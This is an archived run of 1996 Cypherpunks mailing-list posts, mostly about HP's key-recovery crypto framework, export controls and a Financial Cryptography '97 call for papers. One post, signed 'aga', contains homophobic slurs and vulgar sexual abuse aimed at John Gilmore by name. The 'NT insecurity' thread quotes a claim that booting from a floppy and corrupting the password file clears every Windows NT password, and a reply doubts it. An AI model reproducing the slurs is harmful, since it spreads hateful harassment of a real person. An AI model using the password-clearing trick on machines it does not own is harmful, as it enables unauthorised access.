Kevin McCurley, Sandia Laboratories, Albuquerque, NM, USA
Charles Merrill, McCarter & English, Newark, NJ, USA
Clifford Neuman, Information Sciences Institute, Marina del Rey, CA, USA
Sholom Rosen, Citibank, New York, NY, USA
Israel Sendrovic, Federal Reserve Bank of New York, New York, NY, USA


General Chairs:

Robert Hettinga, Shipwright, Boston, MA, USA
   email: rah@shipwright.com
Vincent Cate, Offshore Information Services, Anguilla, BWI
   email: vince@offshore.com.ai


Conference, Exhibits, and Sponsorship Manager:

Julie Rackliffe, Boston, MA, USA
   email: rackliffe@tcm.org


Workshop Leader:

Ian Goldberg, Berkeley, CA, USA
   email: iang@cs.berkeley.edu


Financial Cryptography '97 is held in cooperation with the
International Association for Cryptologic Research.

Those interested in becoming a sponsor of FC97 or in purchasing
exhibit space, please contact the Exhibits and Sponsorship Manager.

A copy of this call for papers as well as other information about the
conference will be available at URL http://www.cwi.nl/conferences/FC97.


--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Mon, 18 Nov 1996 09:05:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: HP crypto-announcement and key recovery, from The Netly News
Message-ID: <Pine.GSO.3.95.961118090444.15248D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Mon, 18 Nov 1996 09:03:25 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: HP crypto-announcement and key recovery, from The Netly News

The Netly News
http://netlynews.com/
November 18, 1996

Under Lock And Key Recovery
By Declan McCullagh (declan@well.com)
                                       
        As a non-event, it was a rather well-attended one. This morning
   Hewlett-Packard Co. threw a press conference in Washington, DC to
   announce that it had vaulted the Federal government's export
   restriction hurdles by including "key recovery" technology in its
   encryption products.
   
        At least that's what the press release said. The reality is
   somewhat less exciting: HP's announcement is crypto-vaporware. "We're
   not making any specific announcements of products today," admitted
   Doug McGowan, HP development director.
   
        HP's move comes after competitors such as IBM and DEC stole the
   limelight last month by being the first to buy into the Clinton
   administration's latest key escrow scheme which would allow U.S. law
   enforcement agencies to locate copies of the private keys used to
   encode files and communications. The company's announcement follows a
   presidential executive order signed last Friday codifying the
   administration's "key recovery" proposal unveiled in October, which
   the White House hopes will splinter an industry previously united in
   opposition to Federal regulations governing encryption exports.
   
        HP responded by flying CEO Lew Platt into town today to announce
   a product using plug-in hardware or software "activation tokens" that
   can vary by country -- but Platt admitted that the tokens don't exist
   yet. Rather, he admitted, it's only a product with "a security
   framework built into it" that currently uses woefully-insecure 40-bit
   DES encryption. Eventually, HP hopes to export crypto that's stronger,
   but the company declined to discuss details.
   
        Dave Banisar, a policy analyst at EPIC, says such a system would
   be "worse" than current policy. "It's got this new detection system in
   it that requires monitoring of your crypto use and program use to
   determine what the national government says is correct," he says.
   
        The "key recovery" technology HP licensing is likely to come from
   Trusted Information Systems Inc., a company founded by former NSAers
   that still enjoys close ties to the spook community. TIS's Commercial
   Key Escrow uses the 56-bit Data Encryption Standard and so was cleared
   for export on January 18, 1996.
   
       "This is the first step toward implementing key recovery. That's a
   policy that's just not going to solve the privacy problem for Internet
   users," says Alan Davidson, staff counsel for the Center for Democracy
   and Technology. "This is the first step on that road toward building
   key recovery for the world. It's a very dangerous thing."
   
        Clinton's executive order is carefully crafted to counter the
   three strategies that crypto privacy proponents have devised to kill
   the export rules: the public relations, the judicial and the
   legislative approaches.
   
        Netizens, privacy advocates and high-tech firms rightfully
   blasted the old export policy, which classified crypto as a
   "munition," as a relic of the cold war -- a sentiment with which even
   The New York Times agreed. So Clinton has reclassified it as a
   non-munition, yet the change is in name only: Netscape browsers remain
   subject to export controls.
   
        Several lawsuits are challenging the constitutionality of the old
   export regulations. So Clinton's executive order contains language
   that EFF's John Gilmore says is designed "to evade the current
   lawsuits" by taking aim at some of the legal arguments.
   
        Administration officials spent an unhappy summer on Capitol Hill
   being grilled by senators who were considering legislation to lift the
   crypto export embargo. So Clinton carefully crafted his announcement
   to defuse some of the reasons to pass this legislation when Congress
   returns in January.

       In other words, the White House has been able to answer or deflect
   many issues that netizens have raised in favor of strong encryption.
   But another argument may not be as easy to counter.
   
        Patrick Ball is a senior program associate at the American
   Association for the Advancement of Science who has traveled the globe
   teaching human rights workers how to protect themselves from
   oppressive governments. The stamps on his passport read like a who's
   who of censor-happy regimes: El Salvador, Ethiopia, Haiti, Guatemala,
   South Africa and Turkey. "I have done PGP training in every country
   I've worked in," says Ball.
   
        To Ball, the debate over crypto isn't about civil rights or
   businesses losing export dollars, but over something much more
   fundamental: human rights. He says: "Why do security police grab
   people and torture them? To get their information. If you build an
   information management system that concentrates information from
   dozens of people, you've made that dozens of times more attractive.
   You've focused the repressive regime's attention on the hard disk. And
   hard disks put up no resistance to torture. You need to give the hard
   disk a way to resist. That's cryptography."
   
        And that's a winning argument.

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 Nov 1996 06:10:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: DOO_dad
Message-ID: <1.5.4.32.19961118140818.0069e60c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Several pieces on the export of encryption regs, the crypto czar,
Motorola's crypto modem, PGP's buy of PrivNet, and Keytronic's 
finger-ID keyboard.

Professor Denning opines that the HP doodad will include GAK.

-----

http://jya.com/doodad.txt

DOO_dad

----------

The NYT has a long report today on a pedophile computer racket 
run from a prison. With details on how investigators were able to
break through hard drive security and use DejaNews to track a 
suspect. A prison computer business was used to cloak the kiddy
pixels. Red flags the Internet's lurid prospects compared to the virtues
of do-me-dads like the Times.

see: www.nytimes.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kenneth L. Hamer" <k-hamer@ntx1.cso.uiuc.edu>
Date: Mon, 18 Nov 1996 07:19:27 -0800 (PST)
To: "'cypherpunks'" <adamsc@io-online.com>
Subject: RE: NT insecurity
Message-ID: <c=US%a=_%p=UIUC%l=NTX1-961118152200Z-47@ntx1.cso.uiuc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Really?  Could you provide a reference for this assertion?  What is the
name of the "password file"?  Where is it located on the disk?

I'd be very interested to try this out on one of my test systems,
especially if it is true.  But my experiences with corrupted registry
hives leads me to believe you are incorrect.  NT usually does nothing so
nice when it's registry is corrupted.  That's why we keep "emergency
repair disks" around 8-).
- Ken

>----------
>From: 	Adamsc@io-online.com[SMTP:Adamsc@io-online.com]
>Sent: 	Monday, November 11, 1996 9:36 PM
>To: 	cypherpunks
>Subject: 	BoS: NT insecurity
>
>Given the recent comments about insecure machines, I thought it was
>interesting to note that you can clear *every* password on an NT box by
>using
>a diskeditor to corrupt the password file (Boot off of a floppy and use
>NTFSDOS if you have to).  It'll reboot several times and then you'll be
>allowed to login.
>
>#  Chris Adams <adamsc@io-online.com>   |
>http://www.io-online.com/adamsc/adamsc.htp
>#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
>"That's our advantage at Microsoft; we set the standards and we can
>change them."
>   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review
>editorial)
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piotr Kunio <piotrk@opnt.optimus.wroc.pl>
Date: Mon, 18 Nov 1996 00:31:39 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: No Subject
Message-ID: <01BBD533.96D4D6C0@opw13.optimus.wroc.pl>
MIME-Version: 1.0
Content-Type: text/plain


unsunscribe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Mon, 18 Nov 1996 06:37:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cpunks Frog Forwards discontinuation
Message-ID: <199611181437.JAA22942@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text


 
I will be discontinuing my "Cpunks Frog Forwards" filtering service within
one week of the announcement of Perry Metzger's new crypto list, and possibly
sooner if my patience runs out, because 1) I have too many other things to
take care of in my life, 2) there really isn't as great a need for it anymore
due to the number and variety of other filtering services, and 3) my sanity
is being stretched to its limits having to wade through the mountains of
bullshit that now infest my inbox, even with procmail's kindly assistance.
Perry was right: Cypherpunks has become a sewer. As Robert Anton Wilson said,
"Only a sewer accepts everything."
 
Here is a list of the other filtering services I am currently aware of:
 
 o Alan Clegg runs an UNMODERATED cypherpunks digest, which only reduces the
   the volume of separate messages. Subscribe by mailing to
 
    majordomo@gateway.com
 
    (Standard majordomo list -- send "help" in the body for information.)
 
 
 o Eric Blossom runs a commercial "Cypherpunks Lite" for a modest fee,
   approximately 20.00US/year. Mail eb@comsec.com for more info. For a
   sample, read the archive at
 
   ftp://ftp.crl.com/users/co/comsec/cp-lite
 
 
 o Ray Arachelian runs a free filtering service, sticking mostly to news
   and technical stuff with a few other tidbits thrown in. Mail
 
   sunder@dorsai.dorsai.org
 
   for more info, or to be added.
 
 
See you all on the other side.
 
"Cypherpunks write code."
 
--
I let go of the law, and people become honest /  I let go of economics, and
people become prosperous / I let go of religion, and people become serene /
I let go of all desire for the common good,  and the good becomes common as
grass.    .oOo.    [Tao Te Ching, Chapter 57, Stephen Mitchell translation]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Mon, 18 Nov 1996 09:57:15 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: TIS + HP
Message-ID: <3.0b36.32.19961118095521.00dec794@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:18 AM 11/18/96 -0500, John Young wrote:
>A blurb in the Wash Post today says that the HP roll-out
>this morning will include TIS's "trusted third party" product.
>"One essential ingredient in the equation: technology
>developed by TIS. TIS is so far the only company that has 
>received permission to export encryption technology 
>overseas that exceeds the government's existing 
>threshold."
>
>Guess we'll know shortly who else in the System is to be 
>Trusted with Information -- other than Thirds, Fourths and
>other Dots and Steves.

With TIS bending over for the big GAK Monster in so many ways, it brings up
a question...  (A probibly off-topic one...)

Does anyone know of intentional GAK-like holes put in their Firewall
Toolkit?  They distribute it for free and distribute source, but with their
record i have little trust in the matter...  (Better yet, does anyone have
suggestions for Firewall code that will run under Linux or FreeBSD?)



---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 18 Nov 1996 09:53:19 -0800 (PST)
To: Piotr Kunio <cypherpunks@toad.com>
Subject: How to Unsubscribe, yet again
In-Reply-To: <01BBD533.96D4D6C0@opw13.optimus.wroc.pl>
Message-ID: <v03007801aeb65341705f@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:31 AM +0000 11/18/96, Piotr Kunio wrote:
>unsunscribe

I can understand people in other lands having some troubles with many
English words, but one would've thought the constant stream of comments
about the correct spelling of "subscribe" and "unsubscribe" would
eventually get through. Or that people would learn to cut-and-paste from
posted instructions.

Once again, instructions on unsubscribing are included below.

Alas, as usual, those most in need in need of such instructions are the
least likely to ever read these messages.

--Tim





To subscribe to the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: subscribe cypherpunks

To unsubscribe from the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: unsubscribe cypherpunks







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Mon, 18 Nov 1996 09:55:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Cypherpunks State of Emergency
Message-ID: <3.0b28.32.19961118095944.007007dc@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:51 PM 11/16/96 -0800, Tim May wrote:

>And sabotaging the GAK scheme in more devious ways remains an option.

I see several "leverage" points here:

The cards can use either a "dongle" model, similar to that used in ordinary
copy protection, which has to date been a big failure - or they can use an
"on-card processor" model, where the card does the actual crypto
processing. This will be tough to break using the traditional cracking
techniques, but will also be expensive.

And card distribution can be either weak or strict; if it's a weak model
(e.g., cards are sold at Fry's or 7-11 :) or are otherwise easy to come by)
it'll be tough to control their distribution and export. It's a little
easier to control the export of chips than to control the export of
software, but neither is easy. And strict distribution will cost an
enormous amount of time and money as some agency or another is deputized or
created to check credentials, keep records, issue keycards, charge fees,
and so forth.

If cards are easy to come by, requiring them won't be much of a deterrent
to the use of strong crypto; the people the government is supposedly trying
to keep from using crypto (terrorists, spies, etc) are already accustomed
to keeping and purchasing things which are forbidden. If cards are
difficult to come by, that's a big hole waiting for someone to fill with
software crypto, or software tricks to get around the hardware requirements. 

One bug/feature I suspect we'll see will be the inclusion of the keycard's
ID in every message that it signs, facilitating detection of unauthorized
use and traffic analysis. Without this, the scheme seems entirely futile.
(Which is not to say that the US Government hasn't done some futile things
:), but ..) Another likely feature is an expiration date, such that the
cards stop working after X months and the owner must go to the Bureau of
Crypto Control and show his/her credentials and exchange the old card for a
new one. Of course, if you've got outstanding warrants or haven't filed
your taxes or are in arrears for child support or are a "foreign person" or
have been saying illegal/controversial things with your crypto card, well,
perhaps you won't feel like going down to the BCC after all. 

So they're going to have to find a way to make the cards easy/cheap enough
to get that many people will adopt them; but they have to be
expensive/difficult enough to get that people won't want to "lose" them,
lest they fall into the hands of the wrong people. And that seems like a
difficult task, especially if opponents of the scheme continue to provide
cheap/free software-only solutions. And, as always, folks not subject to
the US export regulations won't need to fuss with all of this regulatory
bullshit, and can produce strong software-only crypto, or drop-in
replacements for the "policy chips" which are distributed without
government control. 

--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | 
http://www.io.com/~gbroiles | Export jobs, not crypto.
                            | 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Mon, 18 Nov 1996 10:09:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: HP proposal available
Message-ID: <199611181809.KAA27124@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


HP has put up info on its crypto proposal at http://www.hp.com/go/icf.
You can also try http://www.dmo.hp.com/gsy/security/icf/main.html if that
URL is slow.

The basic idea is what we had been speculating, their old
"International Cryptography Framework" based on hardware crypto cards.
It has now been given government approval, which is no big surprise
since the system looks like it's been designed by fed bootlickers.

The claim of other companies signing on is less impressive than it
sounds.  They're using Microsoft's Crypto API, and of course Microsoft
would like plenty of companies to use it.  Intel offers to build some
hardware, which is more business for them.  "Netscape and VeriFone are
exploring a wide range of uses for ICF technology."  That's all they
say about those companies.  This is hardly a commitment; Netscape and
other companies generally keep abreast of everything happening in the
field to keep their options open.  So this is not a resounding
endorsement.

The one good thing about the plan is that since it is very complicated
and requires specialized hardware, we probably won't see any impact from
it for years.  Hopefully it will be obsolete before it can be deployed.

The plan itself is an NSA wet dream.  Not only do you need a token
from Big Brother to activate the crypto in your computer (the token
can be hardware or software, but the crypto card itself apparently
must be hardware), it's also necessary for any application which wants
to use crypto to supply an application specific certificate to the card.
This lets the law enforcement bureaucrats not only determine who gets to
use crypto, but which applications get access to it.  If you want to build
an app which will use crypto you'll have to get permission from the
authorities in order for them to give you a certificate which you can
compile in to let your app run.

The one thing which was not clear was how much of these rules would apply
within the U.S.  In fact notably missing from the press release, white
paper, overviews, slides, etc. on the web site was any discussion of civil
liberties impact.  It certainly was not listed as one of the considerations
in the design of the system.

Overall, I'd say this is just HP trumpeting the unsurprising government
approval of their ICF system and turning it into a press event by providing
some lukewarm "endorsements" from well known companies.  This system looks
to me like it's got a long way to go before it becomes a widely used
standard.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Mon, 18 Nov 1996 07:29:15 -0800 (PST)
To: Sven <sven@loop.com>
Subject: Re: [NOISE] aga isn't on cypherpunks... (and I'm glad)
In-Reply-To: <199611171834.KAA14867@patty.loop.net>
Message-ID: <Pine.LNX.3.95.961118101854.21676O-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, Sven wrote:

> Date: Sun, 17 Nov 1996 10:34:13 -0800
> From: Sven <sven@loop.com>
> To: aga <aga@dhp.com>
> Cc: cypherpunks@toad.com
> Subject: Re: [NOISE] aga isn't on cypherpunks... (and I'm glad)
> 
> 
> >> 	I have a suggestion...  How 'bout if everybody on this list dropped
> >> a procmail configuration that mailed aga@dhp.com and postmaster@dhp.com
> >> a copy of every message that originated from aga@dhp.com?  Do you think
> >> he would start to "get it" then?
> 

That cocksucker is not dumb enough to try that.  It is him who
will get terminated after I talk with his postmaster.


> Why are these people so uptight?
> 
> Sven
> 
> 

Maybe because John Gilmore is a faggot and takes it up
the ass.  That was the real reason behind the clash.  Dr. Vulis
just does not like Faggots, and Gilmore has admitted to being queer.
The one thing must be said about the Internet is that Faggots are
not allowed to have any Authority positions, and this John Gilmore
Faggot violates that rule.

Never trust anybody who does not fuck cunt.

-aga







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Mon, 18 Nov 1996 10:23:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: HP announcement
Message-ID: <3.0b28.32.19961118103631.006b5260@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


HP has info on its new crypto stuff on the web now:

<http://www.hp.com/go/security> and
<http://www.hp.com/go/icf>.

It's apparently a crypto coprocessor embedded in a board or chip which
looks for a "policy token" (which is software/data, delivered via network
or smartcard) which is doled out by local "policy servers", "developed and
managed in conformance with national policy". 

Sounds to me like they want to be able to turn off strong crypto the way
they can turn off high-detail GPS during politically/militarily sensitive
events. 

As the press release notes,

"ICF is designed to run any current or future cryptographic algorithms.
Algorithms for key recovery also can be used. "Keys" are strings of
computer code that lock and unlock data. Key recovery is a method that
allows users to unscramble encrypted data if they lose their keys. Users
can decide whether to use key recovery, based on personal needs or domestic
-- or foreign -- government regulations. 

ICF cryptographic units, which can support keys of any length, are
exportable because they are disabled until a Policy Activation Token
activates them again. Policy Activation Tokens can be either a downloadable
software module or a smart card. Policy Activation Tokens trigger
particular algorithms for specific applications, based on needs.
Additionally, ICF adapts easily to current government encryption policies,
new encryption algorithms and changing key-recovery schemes. Customers who
use ICF-based products are offered long-term investment protection, with
rapid flexibility to meet changing needs." 

ICF is "International Cryptography Framework". 

The press release includes quotes from US and French government officials
indicating that the new system will meet their needs.


--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | 
http://www.io.com/~gbroiles | Export jobs, not crypto.
                            | 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Mon, 18 Nov 1996 10:52:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ?????
Message-ID: <199611181848.KAA17573@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Date: Sun, 17 Nov 1996 05:36:00 -0800
To: cypherpunks@toad.com

(John Anonymous MacDonald) apparently wrote:

|Dale Thorn wrote:

|>people on a list are given tools to filter with and reminded on |>occasion
|>how to use them?

|You are the reason, you can't shut up and you have little or nothing |to say. plonk.

I wish I'd said that; my fear is that Dale will take 17 messages to compose his vapid thoughts.

Love you all.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: csa@netmaine.com (CSA Administration)
Date: Mon, 18 Nov 1996 08:08:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re:  Command confirmation request (057CCA)
Message-ID: <9611181604.AA23932@wicked.netmaine.com>
MIME-Version: 1.0
Content-Type: text/plain


ok




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 Nov 1996 08:21:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: TIS + HP
Message-ID: <1.5.4.32.19961118161849.006a3b98@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


A blurb in the Wash Post today says that the HP roll-out
this morning will include TIS's "trusted third party" product.
"One essential ingredient in the equation: technology
developed by TIS. TIS is so far the only company that has 
received permission to export encryption technology 
overseas that exceeds the government's existing 
threshold."

Guess we'll know shortly who else in the System is to be 
Trusted with Information -- other than Thirds, Fourths and
other Dots and Steves.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 18 Nov 1996 11:34:40 -0800 (PST)
To: John Young <cypherpunks@toad.com
Subject: Re: POC_ket
In-Reply-To: <1.5.4.32.19961118164214.006e9e00@pop.pipeline.com>
Message-ID: <v03007803aeb669e1c21e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:42 AM -0500 11/18/96, John Young wrote:
>WaJo reports today on IBM's tiny pocket computer that
>transmits data through the body -- to another body or to
>a device such as a telephone. Invented by Tom Zimmerman,
>formerly of the Media Lab, it can tell "anything you touch
>who you are." Being shown at Comdex.


Brings new meaning to "Reach out and touch someone."


To make some crypto points, I watched the H-P/Intel/Microsoft CFT press
conference...the Intel guy, Ron Smith, was someone I worked with several
times in the 1980s.

One of the very troubling concerns is the blithe acceptance by all
commentators I saw on how natural it is that "policy cards" would be based
on whatever governments decided was OK. No libertarian or anarchist views
were heard. It was just sort of tacitly accepted that if, for example,
Saudi Arabia wanted to ensure that women could not use the new system, an
appropriate policy card would be denied to women, and that card vendors
would set the gender bit appropriately.

(This was not an example used, but it of course is a reasonable example of
what Muslim countries will do....not to start a flame war, these comments,
but just to point out that many or even most uses of "policy cards" will be
for uses we in the West consider unacceptable.)

I'm also very concerned that ubiquitous use of CFT means a shift to
"machine-centric" key models. Instead of being able to have ephemeral
public keys for various uses, the model assumes basically a simple
machine-to-machine communications model. "Throwaway keys" are not likely.

Now the issue is going to be to what extent the CFT technology displaces
other models, or even whether non-policy card models are restricted or
banned.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 Nov 1996 08:44:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: POC_ket
Message-ID: <1.5.4.32.19961118164214.006e9e00@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


WaJo reports today on IBM's tiny pocket computer that
transmits data through the body -- to another body or to
a device such as a telephone. Invented by Tom Zimmerman,
formerly of the Media Lab, it can tell "anything you touch
who you are." Being shown at Comdex.

The body as a token. How to crack a human? Grab and 
squeeze out a pass phrase.

-----

http://jya.com/pocket.txt

POC_ket






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: R.Hirschfeld@cwi.nl
Date: Mon, 18 Nov 1996 03:09:37 -0800 (PST)
To: ray@cwi.nl
Subject: FC97 Final Call for Papers
Message-ID: <9611181046.AA28355=ray@groen.cwi.nl>
MIME-Version: 1.0
Content-Type: text/plain


		      Financial Cryptography '97
		  February 24-28 1997, Anguilla, BWI
			FINAL CALL FOR PAPERS


General Information:

Financial Cryptography '97 (FC97) is a new conference on the security
of digital financial transactions.  The first meeting will be held on
the island of Anguilla in the British West Indies on February 24-28,
1997.  FC97 aims to bring together persons involved in both the
financial and data security fields to foster cooperation and exchange
of ideas.

Original papers are solicited on all aspects of financial data
security and digital commerce in general, including

    Anonymous Payments                      Fungibility       
    Authentication                          Home Banking       
    Communication Security                  Identification     
    Conditional Access                      Implementations    
    Copyright Protection                    Loss Tolerance     
    Credit/Debit Cards                      Loyalty Mechanisms 
    Currency Exchange                       Legal Aspects      
    Digital Cash                            Micropayments      
    Digital Receipts                        Network Payments   
    Digital Signatures                      Privacy Issues     
    Economic Implications                   Regulatory Issues  
    Electronic Funds Transfer               Smart Cards        
    Electronic Purses                       Standards
    Electronic Voting                       Tamper Resistance
    Electronic Wallets                      Transferability


Instructions for Authors:

Send a cover letter and 9 copies of an extended abstract to be
received by November 29, 1996 to the Program Chair at the address
given below.

The extended abstract should start with the title and an abstract
followed by a succinct statement appropriate for a non-specialist
reader specifying the subject addressed, its background, the main
achievements, and their significance to financial data security.
Submissions are limited to 15 single-spaced pages of 12pt type.
Notification of acceptance or rejection will be sent to authors no
later than January 17, 1997.

Authors of accepted papers must guarantee that their paper will
be presented at the conference.


Proceedings:

Proceedings of the conference will be published online in the Journal
of Internet Banking and Commerce.  Instructions and deadlines for
submission of final papers will be sent along with notification of
acceptance.


Stipends:

A very limited number of stipends may be available to those unable to
obtain funding to attend the conference.  Students whose papers are
accepted and who will present the paper themselves are encouraged to
apply if such assistance is needed.  Requests for stipends should be
addressed to one of the General Chairs.


Registration:

Conference registration and information on travel, hotels, and
Anguilla itself is available at URL http://www.offshore.com.ai/fc97/.


Workshop:

A workshop, intended for anyone with commercial software development
experience who wants hands-on familiarity with the issues and
technology of financial cryptography, is planned in conjunction with
FC97, to be held during the week preceding the conference.  For
further information, please contact one of the General Chairs.


Send Submissions to:

Rafael Hirschfeld
FC97 Program Chair
CWI
Kruislaan 413
1098 SJ Amsterdam
The Netherlands
email: ray@cwi.nl
phone: +31 20 592 4169
fax: +31 20 592 4199


Program Committee:

Matthew Franklin, AT&T Laboratories--Research, Murray Hill, NJ, USA
Michael Froomkin, U. Miami School of Law, Coral Gables, FL, USA
Rafael Hirschfeld, CWI, Amsterdam, The Netherlands
Arjen Lenstra, Citibank, New York, NY, USA
Mark Manasse, Digital Equipment Corporation, Palo Alto, CA, USA
Kevin McCurley, Sandia Laboratories, Albuquerque, NM, USA
Charles Merrill, McCarter & English, Newark, NJ, USA
Clifford Neuman, Information Sciences Institute, Marina del Rey, CA, USA
Sholom Rosen, Citibank, New York, NY, USA
Israel Sendrovic, Federal Reserve Bank of New York, New York, NY, USA


General Chairs:

Robert Hettinga, Shipwright, Boston, MA, USA
   email: rah@shipwright.com
Vincent Cate, Offshore Information Services, Anguilla, BWI
   email: vince@offshore.com.ai


Conference, Exhibits, and Sponsorship Manager:

Julie Rackliffe, Boston, MA, USA
   email: rackliffe@tcm.org


Workshop Leader:

Ian Goldberg, Berkeley, CA, USA
   email: iang@cs.berkeley.edu


Financial Cryptography '97 is held in cooperation with the
International Association for Cryptologic Research.

Those interested in becoming a sponsor of FC97 or in purchasing
exhibit space, please contact the Exhibits and Sponsorship Manager.

A copy of this call for papers as well as other information about the
conference will be available at URL http://www.cwi.nl/conferences/FC97.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Mon, 18 Nov 1996 11:53:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Utility of Privacy
Message-ID: <199611181953.LAA05242@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 6:55 AM 11/18/1996, Sandy Sandfort wrote:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                          SANDY SANDFORT
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>
>C'punks,
>
>On Sun, 17 Nov 1996, Huge Cajones Remailer wrote:
>
>> >> Informally, I don't know anybody who has suffered due to a loss of
>> >> privacy.
>> >
>> >Your circle of associations must be limited.
>> 
>> Examples [of people who have suffered due to loss of privacy]?
>
>Phil Zimmermann often tells the story of a woman whose marriage
>was destroyed by the revelation of a long-past indiscretion. 
>After her husband divorced her, she committed suicide.

Deceiving your spouse is not a good reason to protect your privacy.

>Any number of celebrities have been stalked, attacked and even
>killed by obsessed fans who found them through public records.

Unfortunately most readers of this list do not have this problem.

>Every year, children and business executives are kidnapped for
>ransom.  The proximate cause of these kidnappings is a breach in
>privacy about the whereabouts and schedules of the victim.  

Or this problem.

>Hitler's gun registration in Germany allowed the Jews to be
>disarmed.  I'm sure you are aware of the ultimate consequences
>of that little invasion of privacy.

Not a bad example, but genocide happens rarely.

Those alert enough to protect their privacy in advance might be alert
enough to get out in time, anyway.

Subjective utility: low.

>The US Post Office co-operated in the identification and 
>imprisonment of people of Japanese ancestry during the second
>world war.

97,000 victims over a ~100 year period.  Doesn't really show up on the
scope, sorry.  (Plus downside bad, but few were murdered.)

>The problem with having a whole lot of private information about
>you floating around in public is not what damage it can do to you
>now, but rather the problems it potentially could cause in the
>future.  Just about everyone on this list has been to university.
>Not long ago, a college education was essentially a death warrant 
>in Cambodia.  Prior to that, a degree was considered a good thing
>there.  People saw no reason to hid the fact that they had been
>in school.  Trouble is, things changed.
>
>And the trouble today is that things can change now, too.  Think
>about the things that you have publicly done or advocated.  Even
>if they are as legal as church on Sunday NOW, how comfortable 
>will you be about them if there is extreme right or left takeover
>in the future?  Start to get the picture?

